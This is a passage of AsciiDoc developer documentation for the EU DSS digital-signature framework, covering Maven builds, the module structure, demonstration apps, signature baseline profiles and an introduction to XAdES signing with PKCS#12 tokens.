These modules allow validating the generated JSON against the related JSON Schema:\n\n * specs-jws;\n * specs-jades.\n\nAlso, as explained in the previous section, some modules must be built completely before their dependent modules can be built when using the quick profile, namely:\n\n * dss-utils;\n * dss-crl-parser;\n * dss-test;\n * dss-pades;\n * dss-asic-common.\n\nThese modules contain common interfaces used in other DSS modules, as well as unit tests to ensure equal behavior between their implementations.\n\n==== Documentation generation\n\nIn order to generate the HTML and PDF documentation for the DSS project, the module `dss-cookbook` of DSS Core must be built with the following command (please ensure that you are located in the `\/dss-cookbook` directory):\n\n----\nmvn clean install -P asciidoctor\n----\n\n==== Javadoc generation\n\nIn order to generate the https:\/\/ec.europa.eu\/cefdigital\/DSS\/webapp-demo\/apidocs\/index.html[HTML Javadoc], you will need to completely build the DSS Core.\n\n[[DSSDemo]]\n=== DSS Demonstrations\n\nThis section explains the build and usage requirements for https:\/\/github.com\/esig\/dss-demonstrations[DSS Demonstration Applications].\n\n==== Requirements\n\nThe minimal requirements to build\/run DSS Demonstrations are:\n\n * Java 8 and higher (tested up to Java 16);\n * Maven 3.6 and higher (if a build is required);\n * Tomcat 8.5+ for Java 8 and Tomcat 9+ for Java 9 and higher (for the Web-application);\n * Memory and Disk: see minimal requirements for the used JVM. In general, the more resources are available, the better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n\n==== Maven build\n\nThe project can be built similarly to the DSS Core framework with the command `mvn clean install`.\n\nPlease ensure that you build the modules you really need, and ignore build failures for non-required modules.\n\n===== DSS Standalone Application\n\nIn order to build the standalone application, the following modules are required:\n\n * dss-mock-tsa;\n * dss-standalone-app;\n * dss-standalone-package.\n \nIf the build is successful, you will find the following containers in the directory `\/dss-standalone-app-package\/target\/`:\n\n * dss-standalone-app-package-minimal.zip - contains the application code; requires JDK and JavaFX to be installed on the target machine in order to run the application;\n * dss-standalone-app-package-complete.zip - contains the application code, as well as the JDK and JavaFX library code; can be run on a machine without pre-installed libraries.\n\nIn order to launch the application, you will need to extract the archive and run the file `dss-run.bat`.\n\n===== DSS Web Application\n\nTo build the DSS Web Application the following modules are required:\n\n * dss-mock-tsa;\n * dss-demo-webapp;\n * dss-demo-bundle.\n \nAfter a successful build, in the directory `\/dss-demo-bundle\/target\/` you will find two containers: `dss-demo-bundle.zip` and `dss-demo-bundle.tar.gz`. Regardless of the container type, the content of both files is the same. After extracting the content, you will need to run the file `Webapp-Startup.bat` in order to launch the server and the file `Webapp-Shutdown.bat` to stop the server. 
After running the server, the web-application will be available at the address `http:\/\/localhost:8080\/`.\n\nIf during TL\/LOTL loading you experience problems with some particular Trusted Lists, please refer to the chapter <<KeyStore>> for a resolution.\n\nThe documentation and javadoc will be copied automatically from the built DSS Core and will be available at the following addresses respectively:\n\n * HTML documentation : `http:\/\/localhost:8080\/doc\/dss-documentation.html`;\n * PDF documentation : `http:\/\/localhost:8080\/doc\/dss-documentation.pdf`;\n * Javadoc : `http:\/\/localhost:8080\/apidocs\/index.html`.\n\nIn order to build a bundle for JDK 16, the following profile can be used from the `dss-demo-bundle` module:\n\n----\nmvn clean install -P java16\n----\n\nThis will create a bundle with Tomcat 9.\n\n===== Integration tests\n\nThe `dss-demo-webapp` module provides a collection of integration tests in order to test the behavior of the REST\/SOAP web-services. In order to run the tests, a web-server with the DSS Web Application shall be launched, and the following profile needs to be executed from the module:\n\n----\nmvn clean install -P run-integration-test\n----\n\n== General framework structure\n\nThe DSS framework is a multi-module project which can be built with Maven.\n\n=== Maven modules\n\n==== Shared modules\n\ndss-enumerations:: Contains a list of all used enumerations in the DSS project.\ndss-alerts:: Allows configuration of triggers and handlers for arbitrarily defined events.\ndss-jaxb-parsers:: Contains a list of all classes used to transform JAXB objects\/strings to Java objects and vice versa.\n\n==== JAXB model modules\n\nspecs-xmldsig:: W3C XSD schema for signatures http:\/\/www.w3.org\/2000\/09\/xmldsig\nspecs-xades:: ETSI EN 319 132-1 XSD schema for XAdES.\nspecs-trusted-list:: ETSI TS 119 612 XSD schema for parsing Trusted Lists.\nspecs-validation-report:: ETSI TS 119 102-2 XSD schema for the Validation report.\nspecs-asic-manifest:: ETSI EN 319 162 schema for ASiCManifest.\nspecs-saml-assertion:: OASIS schema for SAML Assertions.\n\n'''\ndss-policy-jaxb:: JAXB model of the validation policy.\ndss-diagnostic-jaxb:: JAXB model of the diagnostic data.\ndss-detailed-report-jaxb:: JAXB model of the detailed report.\ndss-simple-report-jaxb:: JAXB model of the simple report.\ndss-simple-certificate-report-jaxb:: JAXB model of the simple report for certificates.\n\n==== JSON validation modules\n\nspecs-jws:: JSON Schemas based on the RFC 7515 specifications (not official)\nspecs-jades:: ETSI TS 119 182-1 v.0.0.6 JSON Schemas for JAdES\n\n==== Utils modules\n\ndss-utils:: API with utility methods for String, Collection, I\/O,...\ndss-utils-apache-commons:: Implementation of dss-utils with Apache Commons libraries.\ndss-utils-google-guava:: Implementation of dss-utils with Google Guava.\n\n==== i18n\n\ndss-i18n:: a module allowing internationalization of generated reports.\n\n==== Core modules\n\ndss-model:: Data model used in almost every module.\ndss-crl-parser:: API to validate CRLs and retrieve revocation data.\ndss-crl-parser-stream:: Implementation of dss-crl-parser which streams the CRL.\ndss-crl-parser-x509crl:: Implementation of dss-crl-parser which uses the Java X509CRL object.\ndss-spi:: Interfaces, util classes to manipulate ASN1, compute digests,... \ndss-document:: Common module to sign and validate documents. This module doesn't contain any implementation.\ndss-service:: Implementations to communicate with online resources (TSP, CRL, OCSP). 
\ndss-token:: Token definitions and implementations for MS CAPI, PKCS#11, PKCS#12.\nvalidation-policy:: Business of the signature's validation (ETSI EN 319 102 \/ TS 119 172-4).\ndss-xades:: Implementation of the XAdES signature, extension and validation.\ndss-cades:: Implementation of the CAdES signature, extension and validation.\ndss-jades:: Implementation of the JAdES signature, extension and validation.\ndss-pades:: Common code which is shared between dss-pades-pdfbox and dss-pades-openpdf.\ndss-pades-pdfbox:: Implementation of the PAdES signature, extension and validation with https:\/\/pdfbox.apache.org\/[PDFBox].\ndss-pades-openpdf:: Implementation of the PAdES signature, extension and validation with https:\/\/github.com\/LibrePDF\/OpenPDF[OpenPDF (fork of iText)].\ndss-asic-common:: Common code which is shared between dss-asic-xades and dss-asic-cades.\ndss-asic-cades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on CAdES signatures.\ndss-asic-xades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on XAdES signatures.\ndss-tsl-validation:: Module which allows loading \/ parsing \/ validating of LOTL and TSLs.\n\n==== WebServices\n\ndss-common-remote-dto:: Common classes between all remote services (REST and SOAP).\ndss-common-remote-converter:: Classes which convert the DTO to DSS Objects.\n\n'''\ndss-signature-dto:: Data Transfer Objects used for signature creation\/extension (REST and SOAP).\ndss-signature-remote:: Common classes between dss-signature-rest and dss-signature-soap.\ndss-signature-rest-client:: Client for the REST webservices.\ndss-signature-rest:: REST webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.\ndss-signature-soap-client:: Client for the SOAP webservices.\ndss-signature-soap:: SOAP webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.\n\n'''\ndss-server-signing-dto:: Data Transfer Objects used for the server signing module (REST and SOAP).\ndss-server-signing-common:: Common classes for server signing.\ndss-server-signing-rest:: REST webservice for server signing.\ndss-server-signing-rest-client:: REST client for server signing (sign method).\ndss-server-signing-soap:: SOAP webservice for server signing.\ndss-server-signing-soap-client:: SOAP client for server signing (sign method).\n\n'''\ndss-validation-dto:: Data Transfer Objects used for signature validation (REST and SOAP).\ndss-validation-common:: Common classes between dss-validation-rest and dss-validation-soap.\ndss-validation-rest-client:: Client for the REST signature-validation webservices.\ndss-validation-soap-client:: Client for the SOAP signature-validation webservices.\ndss-validation-rest:: REST webservices to validate a signature.\ndss-validation-soap:: SOAP webservices to validate a signature.\n\n'''\ndss-certificate-validation-dto:: Data Transfer Objects used for certificate validation (REST and SOAP).\ndss-certificate-validation-common:: Common classes between dss-certificate-validation-rest and dss-certificate-validation-soap.\ndss-certificate-validation-rest-client:: Client for the REST certificate-validation webservice.\ndss-certificate-validation-soap-client:: Client for the SOAP certificate-validation webservice.\ndss-certificate-validation-rest:: REST webservice to validate a certificate.\ndss-certificate-validation-soap:: SOAP webservice to validate a certificate.\n\n'''\ndss-timestamp-dto:: Data Transfer Objects used 
for timestamp creation.\ndss-timestamp-remote-common:: Common classes between dss-timestamp-remote-rest and dss-timestamp-remote-soap.\ndss-timestamp-remote-rest-client:: Client for the REST timestamp webservice.\ndss-timestamp-remote-soap-client:: Client for the SOAP timestamp webservice.\ndss-timestamp-remote-rest:: REST webservice to create a timestamp.\ndss-timestamp-remote-soap:: SOAP webservice to create a timestamp.\n\n==== Other modules\n\ndss-test:: Mocks and util classes for unit tests.\ndss-cookbook:: Samples and documentation of DSS used to generate this documentation.\n\n[[dssUtils]]\n=== DSS Utils\n\nThe module dss-utils offers an interface with utility methods to operate on String, Collection, I\/O,... The DSS framework provides two different implementations with the same behaviour:\n\n * dss-utils-apache-commons : this module uses Apache Commons libraries (commons-lang3, commons-collection4, commons-io and commons-codec).\n * dss-utils-google-guava : this module only requires Google Guava (recommended on Android).\n\nIf your integration includes dss-utils, you will need to select an implementation.\n\n[[dssCrlParser]]\n=== DSS CRL Parser\n\nDSS contains two ways to parse\/validate a CRL and to retrieve revocation data. An alternative to the X509CRL Java object was developed to address memory issues in the case of large CRLs: the X509CRL object fully loads the CRL in memory and can cause an OutOfMemoryError.\n\n * dss-crl-parser-x509crl : this module uses the X509CRL java object.\n * dss-crl-parser-streams : this module offers an alternative with CRL streaming (experimental).\n \nIf your integration requires dss-crl-parser, you will need to choose your implementation.\n\n[[dssPades]]\n=== DSS PAdES\n\nSince version 5.4, DSS allows generation\/extension\/validation of PAdES signatures with two different frameworks : PDFBox and OpenPDF (fork of iText). The dss-pades module only contains the common code and requires an underlying implementation : \n \n * dss-pades-pdfbox : Supports drawing of custom text, images, as well as text+image, in a signature field.\n * dss-pades-openpdf : Supports drawing of custom text OR images in a signature field.\n\nDSS permits overriding the visible signature generation with these interfaces : \n\n * eu.europa.esig.dss.pdf.IPdfObjFactory\n * eu.europa.esig.dss.pdf.visible.SignatureDrawerFactory (selects the SignatureDrawer depending on the SignatureImageParameters content)\n * eu.europa.esig.dss.pdf.visible.SignatureDrawer\n\nA new instance of the IPdfObjFactory can be created with its own SignatureDrawerFactory and injected via padesService.setPdfObjFactory(IPdfObjFactory). By default, DSS uses an instance of ServiceLoaderPdfObjFactory. This instance checks for any registered implementation in the classpath with the ServiceLoader (potentially a service from dss-pades-pdfbox, dss-pades-openpdf or your own(s)).\n\n
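For illustration, a minimal sketch of such an injection could look as follows (the certificate verifier is a plain default instance here; a custom IPdfObjFactory implementation returning your own SignatureDrawerFactory would be injected the same way):\n\n[source,java]\n----\nimport eu.europa.esig.dss.pades.signature.PAdESService;\nimport eu.europa.esig.dss.pdf.IPdfObjFactory;\nimport eu.europa.esig.dss.pdf.ServiceLoaderPdfObjFactory;\nimport eu.europa.esig.dss.validation.CommonCertificateVerifier;\n\n\/\/ Inject an IPdfObjFactory into the PAdES service before signing;\n\/\/ ServiceLoaderPdfObjFactory is the default, service-loader based lookup.\nPAdESService padesService = new PAdESService(new CommonCertificateVerifier());\nIPdfObjFactory pdfObjFactory = new ServiceLoaderPdfObjFactory();\npadesService.setPdfObjFactory(pdfObjFactory);\n----\n\n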
==== DSS PDFBox\n\nSince version 5.5, DSS allows switching between two implementations of the PDFBox framework : default (original) and native.\n\n * Default Drawer : The original drawer implemented on the PDFBox framework; supports displaying of custom text, images, or a text+image combination in a signature field. The implementation does not embed the provided custom text into the inner PDF structure; instead, the drawer creates an image representation of the provided text, which is added to the signature field (i.e. the text is not selectable and not searchable).\n * Native Drawer : Since version 5.5, DSS includes a new implementation of the PDFBox Drawer that allows a user to add real custom text, an image or a combination of text and image to a visible signature field. The native implementation embeds the provided custom text into the inner PDF structure, which makes the text selectable and searchable, and also clearer and smoother in comparison with the original implementation.\n\nBy default, DSS uses the \"Default Drawer\" as the PDFBox implementation. In order to switch the implementation, which is allowed at runtime, you have to set a new instance of the PdfObjFactory as follows:\n\n[source,java,indent=0]\n.Runtime PDF Object Factory changing\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=custom-factory]\n----\n\n== Available demonstrations\n\nWith the framework, some demonstrations are provided.\n\n[horizontal]\ndss-mock-tsa:: The class which generates false timestamps from a self-signed certificate.\nsscd-mocca-adapter:: Adapter for the MOCCA connection.\ndss-standalone-app:: Standalone application which allows signing a document with different formats and tokens (JavaFX).\ndss-standalone-app-package:: Packaging module for dss-standalone-app.\ndss-demo-webapp:: Demonstration web application which presents a part of the DSS possibilities.\ndss-demo-bundle:: Packaging module for dss-demo-webapp.\n\nWARNING: The demonstrations use a simulated timestamp service (Mock), so they are not recommended for production usage.\n\nThe requirements and build instructions for DSS demonstrations can be found in the chapter <<DSSDemo>>.\n\n== Signature's profile simplification\n\nThe different formats of the digital signature make it possible to cover a wide range of real-life use cases of this technique. Thus we distinguish the following formats: XAdES, CAdES, PAdES, JAdES and ASiC. To each one of them a specific standard is dedicated. The wide variety of options, settings and versions of the standards makes their interoperability very difficult. This is the main reason for which new standards, commonly called \"baseline profiles\", were published. Their goal is to limit the number of options and variants, thereby making a better interoperability between different actors possible.\n\nIn general, it can be said that for each format of the digital signature the number of security levels defined in the new standards has been reduced. Below is a comparative table of old and new levels for each format of the signature:\n\n[%header,cols=7*^.^]\n.Signature supported profiles\n|=======================\n2+|XAdES\t\t\t\t 2+|CAdES\t\t\t\t 2+|PAdES |JAdES\n|*STANDARD* \t |*BASELINE*\t |*STANDARD* |*BASELINE* \t |*STANDARD*\t |*BASELINE* |*BASELINE*\n|XAdES-BES \t\t.2+|XAdES-B\t |CAdES-BES \t.2+|CAdES-B \t |PAdES-BES .2+|PAdES-B .2+|JAdES-B\n|XAdES-EPES\t\t\t\t\t |CAdES-EPES\t \t\t\t |PAdES-EPES\n|XAdES-T \t\t |XAdES-T |CAdES-T \t |CAdES-T \t |PAdES-T \t |PAdES-T |JAdES-T\n|XAdES-XL \t\t |XAdES-LT \t |CAdES-XL |CAdES-LT \t |PAdES-XL \t |PAdES-LT |JAdES-LT\n|XAdES-A \t\t |XAdES-LTA\t |CAdES-A \t |CAdES-LTA \t |PAdES-LTV \t |PAdES-LTA |JAdES-LTA\n|=======================\n\nNote that the new version (v4) of the DSS framework is compatible with the baseline profiles; it is no longer possible to use the standard profiles for signing purposes. 
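As an illustration, selecting a baseline level comes down to choosing the corresponding `SignatureLevel` enumeration value on the signature parameters (a hedged sketch using the XAdES parameter class introduced later in this document):\n\n[source,java]\n----\nimport eu.europa.esig.dss.enumerations.SignatureLevel;\nimport eu.europa.esig.dss.xades.XAdESSignatureParameters;\n\n\/\/ Only BASELINE levels are supported when creating a signature;\n\/\/ the old STANDARD profiles remain supported for validation only.\nXAdESSignatureParameters parameters = new XAdESSignatureParameters();\nparameters.setSignatureLevel(SignatureLevel.XAdES_BASELINE_B);\n----\n\n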
The validation of the signature still takes into account the old profiles.\n\n[.landscape]\n<<<\n\n=== Signature profile guide\n\nBelow you can find a table specifying various signature possibilities with available in DSS signature's profiles\/formats.\nThe vertical column specifies available signature profiles and their extensions. The horizontal row specifies types of documents to be signed with the formats.\n\n.File formats and Signature types conformance\n[%header,cols=\"12*^.^\"]\n|===\n 3+|Signature profiles |XML |JSON |PDF |Binary |Digest |Multiple files |Multiple signatures |Counter signature |Stand-alone timestamp\n.10+|XAdES .4+|Enveloping |Base64 encoded |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Embed XML |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Manifest |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Canonicalization |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .4+|Enveloped |enveloped transformation |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |based on XPath |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |based on Filter2 |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |Canonicalization |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Internally Detached |icon:check-circle[role=\"lime\"] 
|icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |XML only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|CAdES 2+|Enveloping |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n 2+|Detached |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n|PAdES 2+|Enveloped |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"]\n.6+|JAdES .3+|Enveloping |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n .3+|Detached |Compact Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"] |icon:times-circle[role=\"red\"]\n |Flattened JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n |JSON Serialization |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |SigD only |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"]\n.2+|ASiC |ASiCS |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n |ASiCE |CAdES \/ XAdES |icon:check-circle[role=\"lime\"] 
|icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:times-circle[role=\"red\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"] |icon:check-circle[role=\"lime\"]\n|===\n\n[.portrait]\n<<<\n\n== The XML Signature (XAdES)\n\nThe simplest way to address the digital signature passes through the XAdES format. Indeed, it allows visualization of the signature content with a simple text editor. Thus it becomes much easier to make the connection between theoretical concepts and their implementation. Before embarking on the use of the DSS framework, it is advisable to read the following documents:\n\n * XAdES Specifications (cf. <<R01>>)\n\nAfter reading these documents, it is clear that:\n\n * To electronically sign a document, a signing certificate (that proves the signer's identity) and the access to its associated private key is needed. \n * To electronically validate a signed document the signer's certificate containing the public key is needed. To give a more colourful example: when a digitally signed document is sent to a given person or organization in order to be validated, the certificate with the public key used to create the signature must also be provided.\n\n===\tXAdES Profiles\n\nThe new ETSI standard defines four conformance levels to address the growing need to protect the validity of the signature in time. Henceforth to denote the level of the signature the word \"level\" will be used. Follows the list of levels defined in the standard:\n\n * XAdES-BASELINE-*B*: _Basic Electronic Signature_\nThe lowest and simplest version just containing the SignedInfo, SignatureValue, KeyInfo and SignedProperties. This level combines the old -BES and -EPES levels.\nThis form extends the definition of an electronic signature to conform to the identified signature policy.\n * XAdES-BASELINE-*T*: _Signature with a timestamp_\nA timestamp regarding the time of signing is added to protect against repudiation.\n * XAdES-BASELINE-*LT*: _Signature with Long Term Data_\nCertificates and revocation data are embedded to allow verification in future even if their original source is not available. This level is equivalent to the old -XL level.\n * XAdES-BASELINE-*LTA*: _Signature with Long Term Data and Archive timestamp_\nBy using periodical timestamping (e.g. each year) compromising is prevented which could be caused by weakening previous signatures during a long-time storage period. This level is equivalent to the old -A level.\n\nNOTE: Old levels: -BES, -EPES, -C, -X, -XL, -A are not supported any more when signing.\n\n==== XAdES-BASELINE-B\n\nTo start, let's take a simple XML document:\n\n[[xml_example.xml]]\n[source,xml]\n.xml_example.xml\n----\n<?xml version=\"1.0\"?>\n<test>Hello World !<\/test>\n----\n\nSince this is an XML document, we will use the XAdES signature and more particularly XAdES-BASELINE-B level, which is the lowest level of protection: just satisfying Directive (cf. <<R07>>) legal requirements for advanced signature. The normal process of signing wants to sign first with the level -B or level-T, and then later when it becomes necessary to complete the signature with superior levels. However, the framework allows signing directly with any level.\nWhen signing data, the resulting signature needs to be linked with the data to which it applies. This can be done either by creating a data set which combines the signature and the data (e.g. 
by enveloping the data with the signature or including a signature element in the data set) or placing the signature in a separate resource and having some external means for associating the signature with the data. So, we need to define the packaging of the signature, namely ENVELOPED, ENVELOPING, DETACHED or INTERNALLY-DETACHED. More information about the supported reference transformations for each signature packaging (except 'Detached') can be found in the section <<Reference Transformations>>.\n \n * *ENVELOPED :* when the signature applies to the data that surround it within the document;\n * *ENVELOPING :* when the signed data form a sub-element of the signature itself;\n ** Base64 encoded binaries;\n ** Embed XML object(s);\n ** Embed https:\/\/www.w3.org\/TR\/xmldsig-core\/#sec-o-Manifest[Manifest] object(s).\n * *DETACHED :* when the signature relates to the external resource(s) separated from it.\n * *INTERNALLY-DETACHED :* when the signature and the related signed data are both included in a parent element (only XML).\n\nFor our example, we will use ENVELOPED packaging.\n\nThe DSS framework uses 3 atomic steps to sign a document :\n\n. Compute the digest to be signed;\n. Sign the digest; \n. Sign the document (add the signed digest).\n\nThe DSS framework fully manages steps 1 and 3; we only need to specify how the signature operation itself is performed. DSS offers some implementations in the dss-token module.\n\nTo write our Java code, we still need to specify the type of KeyStore to use for signing our document, or more simply, where the private key can be found. In the package \"eu.europa.esig.dss.token\", we can choose between different connection tokens :\n\n * *Pkcs11SignatureToken :* allows communicating with SmartCards with the PKCS#11 interface. It requires some installed drivers (dll, sso,...).\n * *Pkcs12SignatureToken :* allows signing with a PKCS#12 keystore (.p12 file).\n * *MSCAPISignatureToken :* handles the signature with MS CAPI (the Microsoft interface to communicate with SmartCards).\n * *JKSSignatureToken :* allows signing with a Java Key Store (.jks file).\n\nNOTE: The DSS also provides support for the MOCCA framework to communicate with the SmartCard via PC\/SC, but it involves the installation of the MOCCA and IAIK libraries.\n\nTo know more about the use of the different signature tokens, please consult the \"Management of Signature Tokens\" chapter.\n\nIn our example the class \"Pkcs12SignatureToken\" will be used. A file in PKCS#12 format must be provided to the constructor of the class. It contains an X.509 private key accompanying the public key certificate, protected by a symmetric password. The certification chain can also be included in this file. It is possible to generate dummy certificates and their chains with OpenSSL. Please visit http:\/\/www.openssl.org\/ for more details.\n\n
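A minimal sketch of opening such a token could look like the following (the file name and password are placeholders, and the surrounding method is assumed to declare `throws IOException`):\n\n[source,java]\n----\nimport java.security.KeyStore.PasswordProtection;\nimport java.util.List;\n\nimport eu.europa.esig.dss.token.DSSPrivateKeyEntry;\nimport eu.europa.esig.dss.token.Pkcs12SignatureToken;\n\n\/\/ Open the PKCS#12 keystore and pick a private key entry to sign with.\ntry (Pkcs12SignatureToken token = new Pkcs12SignatureToken(\"user.p12\",\n        new PasswordProtection(\"password\".toCharArray()))) {\n    List<DSSPrivateKeyEntry> keys = token.getKeys();\n    DSSPrivateKeyEntry privateKey = keys.get(0);\n}\n----\n\n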
This is the complete code that allows you to sign our XML document.\n\n[source,java,indent=0]\n.Create a XAdES signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBTest.java[tags=demo]\n----\n\nWhat you may notice is that to sign a document we need to:\n\n * Create an object based on the SignatureParameters class. The number of specified parameters depends on the type and profile of the signature. This object also defines some default parameters.\n * Choose the profile, packaging and signature digest algorithm.\n * Indicate the private key entry to be used.\n * Instantiate the adequate signature service.\n * Carry out the signature process.\n \nThe encryption algorithm is determined by the private key and therefore cannot be forced via the setter of the signature parameters object; doing so would cause an inconsistency in the signature, making its validation impossible. This setter can be used in a particular context where the signing process is distributed across different machines and the private key is known only to the signature value creation process. See the clause \"Signing process\" for more information.\nIn the case where the private key entry object is not available, it is possible to choose the signing certificate and its certificate chain as in the following example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoCertificateChain]\n----\n\nIntegrating the certificate chain in the signature simplifies the building of a prospective certificate chain during the validation process.\n\nBy default the framework uses the current date and time to set the signing date, but in the case where it is necessary to indicate a different time, it is possible to use the setter \"setSigningDate(Date)\" as in the example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningDate]\n----\n\nWhen the specific service is instantiated, a certificate verifier must be set. This object is used to provide four different sources of information:\n\n * the source of trusted certificates (based on the trusted list(s) specific to the context);\n * the source of intermediate certificates used to build the certificate chain up to the trust anchor. This source is only needed when these certificates are not included in the signature itself;\n * the source of OCSP;\n * the source of CRL.\n \nIn the current implementation this object is only used when the profiles -LT or -LTA are created.\n\n
